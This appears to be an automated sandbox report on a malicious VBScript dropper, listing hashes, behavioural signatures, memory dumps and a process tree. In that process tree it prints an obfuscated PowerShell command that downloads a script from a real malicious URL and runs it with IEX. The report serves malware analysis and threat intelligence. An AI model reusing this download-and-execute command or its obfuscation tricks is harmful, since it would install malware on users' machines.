Overview

overview

10

Static

static

WAPOLQA77372.vbs

windows7_x64

10

WAPOLQA77372.vbs

windows10_x64

10

Analysis

  • max time kernel
    120s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    23-10-2021 06:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    WAPOLQA77372.vbs

  • Size

    746B

  • MD5

    ce629de1aaf24d2eb4fa640a576193c2

  • SHA1

    6468c284159433cfdf6722b29beb5a3b7a536cca

  • SHA256

    c473c06a6459fdf0ec51659776a5665e561166d899d4ee20048ba0938a3b5388

  • SHA512

    e9272aa122af17ef6e6decb14465eb2000fe424381a0bbe19fb21468036d5bba85941e3b5b70ef1b9938b50615698e2b4d878efce0376bf6f7835d68f244e5f2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://thespringreviews.com/.Fainl.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WAPOLQA77372.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method,'https://+++++++++++++++++++++.com/.Fainl.txt'.Replace('+++++++++++++++++++++','thespringreviews'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1412

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1412-55-0x0000000000000000-mapping.dmp

    Download

  • memory/1412-57-0x000007FEF1DD0000-0x000007FEF292D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1412-59-0x00000000026C0000-0x00000000026C2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1412-60-0x00000000026C2000-0x00000000026C4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1412-61-0x00000000026C4000-0x00000000026C7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1412-58-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/1412-62-0x00000000026CB000-0x00000000026EA000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1600-54-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp

    Filesize

    8KB

    Download